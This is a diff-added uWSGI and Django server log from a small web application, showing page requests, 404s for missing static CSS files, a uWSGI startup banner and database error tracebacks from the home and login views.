+[pid: 12823|app: 0|req: 1331/1731] 219.228.146.132 () {38 vars in 833 bytes} [Wed Jan 13 08:38:25 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 12823|app: 0|req: 1332/1732] 219.228.146.132 () {38 vars in 845 bytes} [Wed Jan 13 08:38:25 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 12823|app: 0|req: 1333/1733] 219.228.146.132 () {38 vars in 821 bytes} [Wed Jan 13 08:38:25 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 12823|app: 0|req: 1334/1734] 219.228.146.132 () {38 vars in 837 bytes} [Wed Jan 13 08:38:25 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 12823|app: 0|req: 1335/1735] 219.228.146.132 () {38 vars in 767 bytes} [Wed Jan 13 08:38:25 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 12823|app: 0|req: 1336/1736] 219.228.146.132 () {38 vars in 801 bytes} [Wed Jan 13 08:38:25 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 12823|app: 0|req: 1337/1737] 219.228.146.132 () {38 vars in 821 bytes} [Wed Jan 13 08:38:25 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 12823|app: 0|req: 1338/1738] 219.228.146.132 () {38 vars in 877 bytes} [Wed Jan 13 08:38:25 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 12823|app: 0|req: 1339/1739] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 08:38:25 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1340/1740] 219.228.146.132 () {40 vars in 893 bytes} [Wed Jan 13 08:38:28 2021] GET /kind-manage/ => generated 12023 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 12823|app: 0|req: 1341/1741] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 08:38:28 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 12823|app: 0|req: 1342/1742] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 08:38:28 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 12823|app: 0|req: 1343/1743] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 08:38:28 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 12823|app: 0|req: 1344/1744] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 08:38:28 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 12823|app: 0|req: 1345/1745] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 08:38:28 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 12823|app: 0|req: 1346/1746] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 08:38:28 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 12823|app: 0|req: 1347/1747] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 08:38:28 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 12823|app: 0|req: 1348/1748] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 08:38:28 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 12823|app: 0|req: 1349/1749] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 08:38:28 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1350/1750] 219.228.146.132 () {42 vars in 924 bytes} [Wed Jan 13 08:48:23 2021] GET /kind-manage/ => generated 12023 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 12823|app: 0|req: 1351/1751] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 08:48:23 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 12823|app: 0|req: 1352/1752] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 08:48:23 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 12823|app: 0|req: 1353/1753] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 08:48:23 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 12823|app: 0|req: 1354/1754] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 08:48:23 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 12823|app: 0|req: 1355/1755] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 08:48:23 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 12823|app: 0|req: 1356/1756] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 08:48:23 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 12823|app: 0|req: 1357/1757] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 08:48:23 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 12823|app: 0|req: 1358/1758] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 08:48:23 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 12823|app: 0|req: 1359/1759] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 08:48:23 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1360/1760] 219.228.146.132 () {42 vars in 906 bytes} [Wed Jan 13 08:48:27 2021] GET /home/ => generated 10096 bytes in 8 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1)
+[pid: 12823|app: -1|req: -1/1761] 219.228.146.132 () {40 vars in 850 bytes} [Wed Jan 13 08:48:27 2021] GET /static/img/t_photo/8_th.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1762] 219.228.146.132 () {40 vars in 860 bytes} [Wed Jan 13 08:48:27 2021] GET /static/img/t_photo/9_th%20(1).jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1763] 219.228.146.132 () {42 vars in 838 bytes} [Wed Jan 13 08:48:27 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+0
+0
+[, ]
+[pid: 12823|app: 0|req: 1361/1764] 219.228.146.132 () {40 vars in 879 bytes} [Wed Jan 13 08:48:31 2021] GET /all-1-0-0 => generated 9501 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1362/1765] 219.228.146.132 () {40 vars in 883 bytes} [Wed Jan 13 08:48:35 2021] GET /all-0-0-0 => generated 9501 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+0
+0
+[, ]
+[pid: 12823|app: 0|req: 1363/1766] 219.228.146.132 () {40 vars in 883 bytes} [Wed Jan 13 08:48:39 2021] GET /all-1-0-0 => generated 9501 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[]
+[pid: 12823|app: 0|req: 1364/1767] 219.228.146.132 () {40 vars in 882 bytes} [Wed Jan 13 08:48:41 2021] GET /all-3-0-0 => generated 8761 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1365/1768] 219.228.146.132 () {40 vars in 882 bytes} [Wed Jan 13 08:48:47 2021] GET /all-0-0-0 => generated 9501 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+*** Starting uWSGI 2.0.19.1 (64bit) on [Thu Jan 14 15:17:45 2021] ***
+compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 14 January 2021 03:06:44
+os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
+nodename: VM-0-8-centos
+machine: x86_64
+clock source: unix
+pcre jit disabled
+detected number of CPU cores: 1
+current working directory: /www/wwwroot/master
+detected binary path: /www/wwwroot/master/pyweb/bin/uwsgi
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+chdir() to /www/wwwroot/master
+your processes number limit is 3874
+your memory page size is 4096 bytes
+detected max file descriptor number: 100001
+!!! no /etc/mime.types file found !!!
+lock engine: pthread robust mutexes
+thunder lock: disabled (you can enable it with --thunder-lock)
+uWSGI http bound on 0.0.0.0:8000 fd 4
+uwsgi socket 0 bound to TCP address 127.0.0.1:35412 (port auto-assigned) fd 3
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+Python version: 3.6.6 (default, Jan 14 2021, 10:51:21) [GCC 4.8.5 20150623 (Red Hat 4.8.5-44)]
+Python main interpreter initialized at 0x18fd010
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+python threads support enabled
+your server socket listen backlog is limited to 100 connections
+your mercy for graceful operations on workers is 60 seconds
+mapped 166752 bytes (162 KB) for 2 cores
+*** Operational MODE: threaded ***
+WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x18fd010 pid: 32183 (default app)
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+*** uWSGI is running in multiple interpreter mode ***
+spawned uWSGI master process (pid: 32183)
+spawned uWSGI worker 1 (pid: 32185, cores: 2)
+spawned uWSGI http 1 (pid: 32186)
+Not Found: /
+[pid: 32185|app: 0|req: 1/1] 219.228.146.156 () {38 vars in 853 bytes} [Thu Jan 14 07:18:26 2021] GET / => generated 3429 bytes in 47 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /favicon.ico
+[pid: 32185|app: 0|req: 2/2] 219.228.146.156 () {38 vars in 799 bytes} [Thu Jan 14 07:18:27 2021] GET /favicon.ico => generated 3480 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 32185|app: 0|req: 3/3] 219.228.146.156 () {38 vars in 863 bytes} [Thu Jan 14 07:18:32 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1)
+[pid: 32185|app: 0|req: 4/4] 219.228.146.156 () {38 vars in 865 bytes} [Thu Jan 14 07:18:32 2021] GET /login/ => generated 6428 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 32185|app: -1|req: -1/5] 219.228.146.156 () {38 vars in 810 bytes} [Thu Jan 14 07:18:32 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 4 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/6] 219.228.146.156 () {38 vars in 832 bytes} [Thu Jan 14 07:18:32 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 32185|app: -1|req: -1/7] 219.228.146.156 () {38 vars in 814 bytes} [Thu Jan 14 07:18:32 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 3 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/8] 219.228.146.156 () {38 vars in 812 bytes} [Thu Jan 14 07:18:32 2021] GET /static/css/flexslider.css => generated 3552 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 32185|app: -1|req: -1/9] 219.228.146.156 () {38 vars in 793 bytes} [Thu Jan 14 07:18:32 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/10] 219.228.146.156 () {38 vars in 818 bytes} [Thu Jan 14 07:18:32 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 5 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 32185|app: -1|req: -1/11] 219.228.146.156 () {38 vars in 791 bytes} [Thu Jan 14 07:18:33 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/12] 219.228.146.156 () {38 vars in 809 bytes} [Thu Jan 14 07:18:33 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 32185|app: -1|req: -1/13] 219.228.146.156 () {38 vars in 807 bytes} [Thu Jan 14 07:18:33 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/14] 219.228.146.156 () {38 vars in 799 bytes} [Thu Jan 14 07:18:34 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 32185|app: -1|req: -1/15] 219.228.146.156 () {38 vars in 853 bytes} [Thu Jan 14 07:18:36 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/16] 219.228.146.156 () {38 vars in 827 bytes} [Thu Jan 14 07:18:37 2021] GET /static/img/favicon.ico => generated 1150 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 32185|app: 0|req: 5/17] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 07:18:49 2021] POST /login/ => generated 27 bytes in 32 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 32185|app: 0|req: 6/18] 219.228.146.156 () {40 vars in 911 bytes} [Thu Jan 14 07:18:49 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1)
+Internal Server Error: /home/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.OperationalError: (1054, "Unknown column 'app01_topic.t_like' in 'field list'")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 31, in home
+ for t in recommends:
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 287, in __iter__
+ self._fetch_all()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all
+ self._result_cache = list(self._iterable_class(self))
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__
+ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.OperationalError: (1054, "Unknown column 'app01_topic.t_like' in 'field list'")
+[pid: 32185|app: 0|req: 7/19] 219.228.146.156 () {40 vars in 913 bytes} [Thu Jan 14 07:18:50 2021] GET /home/ => generated 183111 bytes in 130 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+[pid: 32185|app: 0|req: 8/20] 219.228.146.156 () {38 vars in 865 bytes} [Thu Jan 14 07:18:53 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.IntegrityError: (1062, "Duplicate entry 'Lucy' for key 'uid'")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.IntegrityError: (1062, "Duplicate entry 'Lucy' for key 'uid'")
+[pid: 32185|app: 0|req: 9/21] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 07:19:06 2021] POST /login/ => generated 208125 bytes in 155 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /login/
